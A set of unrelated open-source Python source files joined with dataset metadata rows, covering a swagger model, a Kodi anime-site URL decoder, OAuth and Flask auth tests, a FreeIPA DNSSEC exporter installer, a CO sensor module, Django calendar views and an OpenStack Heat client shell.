def build_set_configuration_id(self, build_set_configuration_id):
"""
Sets the build_set_configuration_id of this BuildSetStatusChangedEvent.
:param build_set_configuration_id: The build_set_configuration_id of this BuildSetStatusChangedEvent.
:type: int
"""
self._build_set_configuration_id = build_set_configuration_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
elif isinstance(value, datetime):
result[attr] = str(value.date())
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, BuildSetStatusChangedEvent):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| apache-2.0 | 8,449,749,185,241,655,000 | 30.028986 | 233 | 0.598972 | false |
DxCx/plugin.video.9anime | resources/lib/ui/NineAnimeUrlExtender.py | 1 | 3603 | import re
from string import ascii_lowercase as lc, ascii_uppercase as uc, maketrans
class NineAnimeUrlExtender:
# _TS_MAP_TABLE = [i for i in uc if ord(i) % 2 != 0] + [i for i in uc if ord(i) % 2 == 0]
_CUSB64_MAP_TABLE = [i for i in lc if ord(i) % 2 != 0] + [i for i in lc if ord(i) % 2 == 0]
_ts_value_regex = re.compile(ur"<html.*data-ts\s*=[\"]([^\"]+?)[\"]")
_server_value_regex = \
re.compile(ur"\<div\sclass=\"widget-title\"\>\s(.+?)\s\<\/div\>")
_active_server_regex = \
re.compile(ur"\<span\sclass=\"tab active\"\sdata-name=\"(\d+)\".+?")
def __init__(self):
pass
@classmethod
def decode_info(cls, obj):
newObj = {}
for key, value in obj.iteritems():
if type(value) is unicode or type(value) is str:
if value.startswith('.'):
newObj[key] = cls._rot_string(value[1:])
if value.startswith('-'):
newObj[key] = cls._cusb64_string(value[1:])
else:
newObj[key] = value
elif type(value) is dict:
newObj[key] = cls.decode_info(value)
else:
newObj[key] = value
return newObj
@classmethod
def get_server_value(cls, content):
servers = cls._server_value_regex.findall(content)[0]
active_server = cls._active_server_regex.findall(servers)
if len(active_server) != 1:
raise Exception("Cant extract server id")
return int(active_server[0], 10)
@classmethod
def get_ts_value(cls, content):
ts_value = cls._ts_value_regex.findall(content)[0]
return ts_value
# return cls._decode_ts_value(ts_value)
@classmethod
def _rot_string(cls, content):
RotBy = 8
lookup = maketrans(lc + uc, lc[RotBy:] + lc[:RotBy] + uc[RotBy:] + uc[:RotBy])
decoded = str(content).translate(lookup)
return decoded
# @classmethod
# def _decode_ts_value(cls, ts):
# decoded = ""
# for c in ts:
# replaced = False
# if c not in cls._TS_MAP_TABLE:
# decoded += c
# continue
# decoded += uc[cls._TS_MAP_TABLE.index(c)]
# missing_padding = len(decoded) % 4
# if missing_padding:
# decoded += b'=' * (4 - missing_padding)
# return decoded.decode("base64")
@classmethod
def _cusb64_string(cls, content):
decoded = ""
for c in content:
replaced = False
if c not in cls._CUSB64_MAP_TABLE:
decoded += c
continue
decoded += lc[cls._CUSB64_MAP_TABLE.index(c)]
missing_padding = len(decoded) % 4
if missing_padding:
decoded += b'=' * (4 - missing_padding)
return decoded.decode("base64")
@classmethod
def get_extra_url_parameter(cls, id, server, ts):
DD = 'bfcad671'
params = [
('id', str(id)),
('ts', str(ts)),
('server', str(server)),
]
o = cls._s(DD)
for i in params:
o += cls._s(cls._a(DD + i[0], i[1]))
return o
@classmethod
def _s(cls, t):
i = 0
for (e, c) in enumerate(t):
i += ord(c) + e
return i
@classmethod
def _a(cls, t, e):
n = 0
for i in range(max(len(t), len(e))):
n *= ord(e[i]) if i < len(e) else 8
n *= ord(t[i]) if i < len(t) else 8
return format(n, 'x') # convert n to hex string
| gpl-3.0 | -6,710,349,284,111,533,000 | 30.605263 | 95 | 0.502914 | false |
martincochran/score-minion | oauth_token_manager_test.py | 1 | 2779 | #!/usr/bin/env python
#
# Copyright 2014 Martin Cochran
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import test_env_setup
from google.appengine.ext import testbed
import oauth_token_manager
class OauthTokenManagerTest(unittest.TestCase):
def setUp(self):
"""Stub out the datastore so we can test it."""
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_memcache_stub()
self.testbed.init_datastore_v3_stub()
def tearDown(self):
self.testbed.deactivate()
def testMockManager(self):
token_manager = oauth_token_manager.OauthTokenManager(is_mock=True)
self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
# Ensure we didn't actually touch the data store.
account_query = oauth_token_manager.ApiSecret.query(
ancestor=oauth_token_manager.api_secret_key()).order(
-oauth_token_manager.ApiSecret.date_added)
oauth_secrets = account_query.fetch(10)
self.assertEquals(0, len(oauth_secrets))
def testDatastoreBackedManager(self):
token_manager = oauth_token_manager.OauthTokenManager()
self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,579,290,179,118,641,000 | 30.224719 | 74 | 0.721123 | false |
ofayans/freeipa | ipaserver/install/odsexporterinstance.py | 1 | 6389 | #
# Copyright (C) 2014 FreeIPA Contributors see COPYING for license
#
import os
import pwd
import grp
import ldap
from ipaserver.install import service
from ipaserver.install import installutils
from ipapython.ipa_log_manager import root_logger
from ipapython.dn import DN
from ipapython import ipautil
from ipaplatform.constants import constants
from ipaplatform.paths import paths
from ipaplatform import services
from ipalib import errors, api
class ODSExporterInstance(service.Service):
def __init__(self, fstore=None):
super(ODSExporterInstance, self).__init__(
"ipa-ods-exporter",
service_desc="IPA OpenDNSSEC exporter daemon",
fstore=fstore,
keytab=paths.IPA_ODS_EXPORTER_KEYTAB,
service_prefix=u'ipa-ods-exporter'
)
self.ods_uid = None
self.ods_gid = None
self.enable_if_exists = False
suffix = ipautil.dn_attribute_property('_suffix')
def create_instance(self, fqdn, realm_name):
self.backup_state("enabled", self.is_enabled())
self.backup_state("running", self.is_running())
self.fqdn = fqdn
self.realm = realm_name
self.suffix = ipautil.realm_to_suffix(self.realm)
try:
self.stop()
except Exception:
pass
# checking status step must be first
self.step("checking status", self.__check_dnssec_status)
self.step("setting up DNS Key Exporter", self.__setup_key_exporter)
self.step("setting up kerberos principal", self.__setup_principal)
self.step("disabling default signer daemon", self.__disable_signerd)
self.step("starting DNS Key Exporter", self.__start)
self.step("configuring DNS Key Exporter to start on boot", self.__enable)
self.start_creation()
def __check_dnssec_status(self):
try:
self.ods_uid = pwd.getpwnam(constants.ODS_USER).pw_uid
except KeyError:
raise RuntimeError("OpenDNSSEC UID not found")
try:
self.ods_gid = grp.getgrnam(constants.ODS_GROUP).gr_gid
except KeyError:
raise RuntimeError("OpenDNSSEC GID not found")
def __enable(self):
try:
self.ldap_enable('DNSKeyExporter', self.fqdn, None,
self.suffix)
except errors.DuplicateEntry:
root_logger.error("DNSKeyExporter service already exists")
def __setup_key_exporter(self):
installutils.set_directive(paths.SYSCONFIG_IPA_ODS_EXPORTER,
'SOFTHSM2_CONF',
paths.DNSSEC_SOFTHSM2_CONF,
quotes=False, separator='=')
def __setup_principal(self):
assert self.ods_uid is not None
for f in [paths.IPA_ODS_EXPORTER_CCACHE, self.keytab]:
try:
os.remove(f)
except OSError:
pass
installutils.kadmin_addprinc(self.principal)
# Store the keytab on disk
installutils.create_keytab(paths.IPA_ODS_EXPORTER_KEYTAB,
self.principal)
p = self.move_service(self.principal)
if p is None:
# the service has already been moved, perhaps we're doing a DNS reinstall
dns_exporter_principal_dn = DN(
('krbprincipalname', self.principal),
('cn', 'services'), ('cn', 'accounts'), self.suffix)
else:
dns_exporter_principal_dn = p
# Make sure access is strictly reserved to the ods user
os.chmod(self.keytab, 0o440)
os.chown(self.keytab, 0, self.ods_gid)
dns_group = DN(('cn', 'DNS Servers'), ('cn', 'privileges'),
('cn', 'pbac'), self.suffix)
mod = [(ldap.MOD_ADD, 'member', dns_exporter_principal_dn)]
try:
self.admin_conn.modify_s(dns_group, mod)
except ldap.TYPE_OR_VALUE_EXISTS:
pass
except Exception as e:
root_logger.critical("Could not modify principal's %s entry: %s"
% (dns_exporter_principal_dn, str(e)))
raise
# limit-free connection
mod = [(ldap.MOD_REPLACE, 'nsTimeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsSizeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsIdleTimeout', '-1'),
(ldap.MOD_REPLACE, 'nsLookThroughLimit', '-1')]
try:
self.admin_conn.modify_s(dns_exporter_principal_dn, mod)
except Exception as e:
root_logger.critical("Could not set principal's %s LDAP limits: %s"
% (dns_exporter_principal_dn, str(e)))
raise
def __disable_signerd(self):
signerd_service = services.knownservices.ods_signerd
if self.get_state("singerd_running") is None:
self.backup_state("singerd_running", signerd_service.is_running())
if self.get_state("singerd_enabled") is None:
self.backup_state("singerd_enabled", signerd_service.is_enabled())
# disable default opendnssec signer daemon
signerd_service.stop()
signerd_service.mask()
def __start(self):
self.start()
def remove_service(self):
try:
api.Command.service_del(self.principal)
except errors.NotFound:
pass
def uninstall(self):
if not self.is_configured():
return
self.print_msg("Unconfiguring %s" % self.service_name)
# just eat states
self.restore_state("running")
self.restore_state("enabled")
# stop and disable service (IPA service, we do not need it anymore)
self.disable()
self.stop()
# restore state of dnssec default signer daemon
signerd_enabled = self.restore_state("singerd_enabled")
signerd_running = self.restore_state("singerd_running")
signerd_service = services.knownservices.ods_signerd
signerd_service.unmask()
# service was stopped and disabled by setup
if signerd_enabled:
signerd_service.enable()
if signerd_running:
signerd_service.start()
installutils.remove_keytab(self.keytab)
installutils.remove_ccache(ccache_path=paths.IPA_ODS_EXPORTER_CCACHE)
| gpl-3.0 | 3,183,045,108,307,513,300 | 33.535135 | 85 | 0.594929 | false |
k-team/KHome | modules/co_sensor/local_module.py | 1 | 1375 | #-*- coding: utf-8 -*-
import module
from module import use_module
import fields
class COSensor(module.Base):
update_rate = 1000
public_name = 'Capteur CO'
alarm = use_module('Alarm')
class co(fields.sensor.CO,
fields.syntax.Numeric,
fields.io.Graphable,
fields.persistant.Database,
fields.Base):
update_rate = 60
public_name = 'Taux de CO (ppm)'
class limit_value_co(
fields.syntax.Numeric,
fields.io.Readable,
fields.persistant.Database,
fields.Base):
public_name = 'Limite CO (ppm)'
init_value = 5.00
class message_co(
fields.syntax.String,
fields.io.Readable,
fields.io.Writable,
fields.persistant.Database,
fields.Base):
public_name = 'Message d\'alerte CO'
init_value = 'Au #secours il y a la masse de #CO #YOLO #pompier'
class security(fields.Base):
update_rate = 60
def always(self):
try:
sensor = self.module.co()[1]
lie = self.module.limit_value_co()[1]
message = self.module.message_co()[1]
except TypeError:
pass
else:
if sensor > lie:
self.module.alarm.message(message)
| mit | 4,025,652,573,530,431,000 | 26.5 | 72 | 0.531636 | false |
imposeren/django-happenings | happenings/views.py | 1 | 10237 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
# python lib:
from datetime import date, timedelta
# django:
from django.db.models.functions import ExtractHour
from django.views.generic import ListView, DetailView
from django.conf import settings
from django.shortcuts import get_object_or_404
from django.utils.dates import MONTHS_ALT
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
# thirdparties:
import six
# happenings:
from .models import Event
from .utils.displays import month_display, day_display
from .utils.next_event import get_next_event
from .utils.mixins import JSONResponseMixin
from .utils import common as c
URLS_NAMESPACE = getattr(settings, "CALENDAR_URLS_NAMESPACE", 'calendar')
class GenericEventView(JSONResponseMixin, ListView):
model = Event
def render_to_response(self, context, **kwargs):
self.postprocess_context(context)
if self.request.is_ajax():
return self.render_to_json_response(context, **kwargs)
return super(GenericEventView, self).render_to_response(
context, **kwargs
)
def get_context_data(self, **kwargs):
context = super(GenericEventView, self).get_context_data(**kwargs)
self.net, self.category, self.tag = c.get_net_category_tag(
self.request
)
if self.category is not None:
context['cal_category'] = self.category
if self.tag is not None:
context['cal_tag'] = self.tag
return context
def postprocess_context(self, context, *args, **kwargs):
return
class EventMonthView(GenericEventView):
template_name = 'happenings/event_month_list.html'
def get_year_and_month(self, net, qs, **kwargs):
"""
Get the year and month. First tries from kwargs, then from
querystrings. If none, or if cal_ignore qs is specified,
sets year and month to this year and this month.
"""
now = c.get_now()
year = now.year
month = now.month + net
month_orig = None
if 'cal_ignore=true' not in qs:
if 'year' and 'month' in self.kwargs: # try kwargs
year, month_orig = map(
int, (self.kwargs['year'], self.kwargs['month'])
)
month = month_orig + net
else:
try: # try querystring
year = int(self.request.GET['cal_year'])
month_orig = int(self.request.GET['cal_month'])
month = month_orig + net
except Exception:
pass
# return the year and month, and any errors that may have occurred do
# to an invalid month/year being given.
return c.clean_year_month(year, month, month_orig)
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventMonthView, self).get_context_data(**kwargs)
qs = self.request.META['QUERY_STRING']
year, month, error = self.get_year_and_month(self.net, qs)
# add a dict containing the year, month, and month name to the context
current = dict(
year=year, month_num=month, month=MONTHS_ALT[month][:3]
)
context['current'] = current
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month_and_year'] = u"%(month)s, %(year)d" % (
{'month': display_month, 'year': year}
)
if error: # send any year/month errors
context['cal_error'] = error
all_month_events = list(
self.get_month_events(
year, month, self.category, self.tag, loc=True, cncl=True
).annotate(
start_hour=ExtractHour('start_date')
).order_by('start_hour')
)
context['raw_all_month_events'] = all_month_events
context['show_events'] = False
if getattr(settings, "CALENDAR_SHOW_LIST", False):
context['show_events'] = True
context['events'] = c.order_events(all_month_events, d=True) \
if self.request.is_ajax() else c.order_events(all_month_events)
return context
def postprocess_context(self, context, *args, **kwargs):
qs = self.request.META['QUERY_STRING']
mini = True if 'cal_mini=true' in qs else False
start_day = getattr(settings, "CALENDAR_START_DAY", 0)
# get any querystrings that are not next/prev/year/month
if qs:
qs = c.get_qs(qs)
if getattr(settings, "CALENDAR_PASS_VIEW_CONTEXT_TO_DISPLAY_METHOD", False):
month_display_base_context = dict(context)
month_display_base_context.pop('events', None)
else:
month_display_base_context = None
all_month_events = context['raw_all_month_events']
context['calendar'] = month_display(
context['current']['year'],
context['current']['month_num'],
all_month_events,
start_day,
self.net,
qs,
mini,
request=self.request,
base_context=month_display_base_context,
)
class EventDayView(GenericEventView):
template_name = 'happenings/event_day_list.html'
def get_calendar_back_url(self, year, month_num):
self.request.current_app = self.request.resolver_match.namespace
if URLS_NAMESPACE:
view_name = URLS_NAMESPACE + ':list'
else:
view_name = 'list'
return reverse(view_name, args=(year, month_num), current_app=self.request.current_app)
def check_for_cancelled_events(self, d):
"""Check if any events are cancelled on the given date 'd'."""
for event in self.events:
for cn in event.cancellations.all():
if cn.date == d:
event.title += ' (CANCELLED)'
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventDayView, self).get_context_data(**kwargs)
kw = self.kwargs
y, m, d = map(int, (kw['year'], kw['month'], kw['day']))
year, month, day, error = c.clean_year_month_day(y, m, d, self.net)
if error:
context['cal_error'] = error
# Note that we don't prefetch 'cancellations' because they will be
# prefetched later (in day_display in displays.py)
all_month_events = self.get_month_events(
year, month, self.category, self.tag
)
self.events = day_display(
year, month, all_month_events, day
)
self.check_for_cancelled_events(d=date(year, month, day))
context['events'] = self.events
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month'] = display_month
context['month_num'] = month
context['year'] = year
context['day'] = day
context['month_day_year'] = u"%(month)s %(day)d, %(year)d" % (
{'month': display_month, 'day': day, 'year': year}
)
context['calendar_back_url'] = self.get_calendar_back_url(year, month)
# for use in the template to build next & prev querystrings
context['next'], context['prev'] = c.get_next_and_prev(self.net)
return context
class EventDetailView(DetailView):
model = Event
context_object_name = 'event'
def get_object(self):
return get_object_or_404(
Event.objects.prefetch_related(
'location', 'categories', 'tags', 'cancellations'
),
pk=self.kwargs['pk']
)
def get_cncl_days(self):
now = c.get_now()
cncl = self.object.cancellations.all()
return [(x.date, x.reason) for x in cncl if x.date >= now.date()]
def check_cncl(self, d):
cncl = self.object.cancellations.all()
return True if [x for x in cncl if x.date == d] else False
def get_context_data(self, **kwargs):
now = c.get_now()
context = super(EventDetailView, self).get_context_data(**kwargs)
e = self.object
for choice in Event.REPEAT_CHOICES:
if choice[0] == e.repeat:
context['repeat'] = choice[1]
context['cncl_days'] = self.get_cncl_days()
event = [e] # event needs to be an iterable, see get_next_event()
if not e.repeats('NEVER'): # event is ongoing; get next occurrence
if e.will_occur(now):
year, month, day = get_next_event(event, now)
next_event = date(year, month, day)
context['next_event'] = date(year, month, day)
context['next_or_prev_cncl'] = self.check_cncl(next_event)
else: # event is finished repeating; get last occurrence
end = e.end_repeat
last_event = end
if e.repeats('WEEKDAY'):
year, month, day = c.check_weekday(
end.year, end.month, end.day, reverse=True
)
last_event = date(year, month, day)
context['last_event'] = last_event
context['next_or_prev_cncl'] = self.check_cncl(last_event)
else:
if e.is_chunk():
# list of days for single-day event chunk
context['event_days'] = ( # list comp
(e.l_start_date + timedelta(days=x))
for x in range(e.start_end_diff + 1)
)
else:
# let template know if this single-day, non-repeating event is
# cancelled
context['this_cncl'] = self.check_cncl(e.l_start_date.date())
return context
| bsd-2-clause | 1,189,771,832,417,715,700 | 34.058219 | 95 | 0.57722 | false |
starduliang/haha | tests/test_api.py | 1 | 8798 | # -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
from flask import url_for, jsonify
from haha.user.models import User, BlacklistToken
from .factories import UserFactory
import time
class TestRegistering:
"""Register a user."""
def test_auth_registration(self, user, testapp):
""" Test for user registration """
res = testapp.post_json(url_for('auth.register'), dict(username='foo',email='[email protected]',password='123456')) # '/api/auth/register'
data = res.json
assert data['status'] == 'success'
assert data['message'] == 'Successfully registered.'
assert data['auth_token']
assert res.content_type == 'application/json'
assert int(res.status_code) == 201
def test_registered_with_already_registered_user(self, user, testapp):
""" Test registration with already registered email"""
user = User.create(
username='duliang',
email='[email protected]',
password='test'
)
res = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'User already exists. Please Log in.'
assert res.content_type == 'application/json'
assert int(res.status_code) == 202
def test_registered_user_login(self, user, testapp):
""" Test for login of registered-user login """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# registered user login
res = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')))
data = res.json
assert data['status'] == 'success'
assert data['message'] == 'Successfully logged in.'
assert data['auth_token']
assert res.content_type == 'application/json'
assert int(res.status_code) == 200
class TestAuthentication:
"""test auth module."""
def test_non_registered_user_login(self, user, testapp):
""" Test for login of non-registered user """
res = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*") # use status="*" to allow any status_code, refer to: http://docs.pylonsproject.org/projects/webtest/en/1.4.3/
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'User does not exist.'
assert res.content_type == 'application/json'
assert int(res.status_code) == 404
def test_user_status(self, user, testapp):
""" Test for user status """
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
auth_token = str(data_register['auth_token']) # convert type from unicode to string, else assertion error occurs
res = testapp.get(url_for('auth.status'), headers=dict(Authorization='Bearer ' + auth_token))
data = res.json
assert data['status'] == 'success'
assert data['data'] is not None
assert data['data']['email'] == '[email protected]'
assert int(res.status_code) == 200
def test_valid_logout_before_token_expires(self, user, testapp):
""" Test for logout before token expires """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# user login
res_login = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*" )
data_login = res_login.json
assert data_login['status'] == 'success'
assert data_login['message'] == 'Successfully logged in.'
assert data_login['auth_token']
assert res_login.content_type == 'application/json'
assert int(res_login.status_code) == 200
# valid token logout
res = testapp.post_json(url_for('auth.logout'), headers=dict(Authorization='Bearer ' + str(data_login['auth_token'])), status="*")
data = res.json
assert data['status'] == 'success'
assert data['message'] == 'Successfully logged out.'
assert int(res.status_code) == 200
def test_invalid_logout_after_token_expires(self, user, testapp):
""" Testing logout after the token expires """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# user login
res_login = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*" )
data_login = res_login.json
assert data_login['status'] == 'success'
assert data_login['message'] == 'Successfully logged in.'
assert data_login['auth_token']
assert res_login.content_type == 'application/json'
assert int(res_login.status_code) == 200
# invalid token logout
time.sleep(3)
res = testapp.post_json(url_for('auth.logout'), headers=dict(Authorization='Bearer ' + str(data_login['auth_token'])), status="*")
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'Signature expired. Please log in again.'
assert int(res.status_code) == 401
def test_valid_blacklisted_token_logout(self, user, testapp):
""" Test for logout after a valid token gets blacklisted """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# user login
res_login = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*" )
data_login = res_login.json
assert data_login['status'] == 'success'
assert data_login['message'] == 'Successfully logged in.'
assert data_login['auth_token']
assert res_login.content_type == 'application/json'
assert int(res_login.status_code) == 200
# blacklist a valid token
BlacklistToken.create(token=data_login['auth_token'])
# blacklisted valid token logout
res = testapp.post_json(url_for('auth.logout'), headers=dict(Authorization='Bearer ' + str(data_login['auth_token'])), status="*")
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'Token blacklisted. Please log in again.'
assert int(res.status_code) == 401
def test_valid_blacklisted_token_user(self, user, testapp):
""" Test for user status with a blacklisted valid token """
# user registration
resp_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = resp_register.json
# blacklist a valid token
BlacklistToken.create(token=data_register['auth_token'])
# blacklisted valid token load user
response = testapp.get(url_for('auth.status'), headers=dict(Authorization='Bearer ' + str(data_register['auth_token'])), status="*")
data = response.json
assert data['status'] == 'fail'
assert data['message'] == 'Token blacklisted. Please log in again.'
assert int(response.status_code) == 401
| bsd-3-clause | -1,567,163,010,545,778,700 | 50.450292 | 246 | 0.627643 | false |
radez/python-heatclient | heatclient/v1/shell.py | 1 | 7499 | # Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import textwrap
from heatclient.common import utils
import heatclient.exc as exc
def format_parameters(params):
'''
Reformat parameters into dict of format expected by the API
'''
parameters = {}
if params:
for count, p in enumerate(params.split(';'), 1):
(n, v) = p.split('=')
parameters[n] = v
return parameters
def _set_template_fields(hc, args, fields):
if args.template_file:
fields['template'] = json.loads(open(args.template_file).read())
elif args.template_url:
fields['template_url'] = args.template_url
elif args.template_object:
template_body = hc.raw_request('GET', args.template_object)
if template_body:
fields['template'] = json.loads(template_body)
else:
raise exc.CommandError('Could not fetch template from %s'
% args.template_object)
else:
raise exc.CommandError('Need to specify exactly one of '
'--template-file, --template-url '
'or --template-object')
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-c', '--create-timeout', metavar='<TIMEOUT>',
default=60, type=int,
help='Stack creation timeout in minutes. Default: 60')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('name', metavar='<STACK_NAME>',
help='Name of the stack to create.')
def do_create(hc, args):
'''Create the stack'''
fields = {'stack_name': args.name,
'timeoutmins': args.create_timeout,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.create(**fields)
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to delete.')
def do_delete(hc, args):
'''Delete the stack'''
fields = {'stack_id': args.id}
try:
hc.stacks.delete(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to describe.')
def do_describe(hc, args):
'''Describe the stack'''
fields = {'stack_id': args.id}
try:
stack = hc.stacks.get(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
text_wrap = lambda d: '\n'.join(textwrap.wrap(d, 55))
link_format = lambda links: '\n'.join([l['href'] for l in links])
json_format = lambda js: json.dumps(js, indent=2)
formatters = {
'description': text_wrap,
'template_description': text_wrap,
'stack_status_reason': text_wrap,
'parameters': json_format,
'outputs': json_format,
'links': link_format
}
utils.print_dict(stack.to_dict(), formatters=formatters)
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to update.')
def do_update(hc, args):
'''Update the stack'''
fields = {'stack_id': args.id,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.update(**fields)
do_list(hc)
def do_list(hc, args={}):
'''List the user's stacks'''
kwargs = {}
stacks = hc.stacks.list(**kwargs)
field_labels = ['Name/ID', 'Status', 'Created']
fields = ['id', 'stack_status', 'creation_time']
formatters = {
'id': lambda row: '%s/%s' % (row.stack_name, row.id)
}
utils.print_list(stacks, fields, field_labels,
formatters=formatters, sortby=2)
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to get the template for.')
def do_gettemplate(hc, args):
'''Get the template'''
fields = {'stack_id': args.id}
try:
template = hc.stacks.template(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
print json.dumps(template, indent=2)
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values to validate.')
def do_validate(hc, args):
'''Validate a template with parameters'''
fields = {'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
validation = hc.stacks.validate(**fields)
print json.dumps(validation, indent=2)
# TODO only need to implement this once the server supports it
#@utils.arg('-u', '--template-url', metavar='<URL>',
# help='URL of template.')
#@utils.arg('-f', '--template-file', metavar='<FILE>',
# help='Path to the template.')
#def do_estimate_template_cost(hc, args):
# '''Returns the estimated monthly cost of a template'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the events for.')
#def do_event_list(hc, args):
# '''List events for a stack'''
# pass
#
#
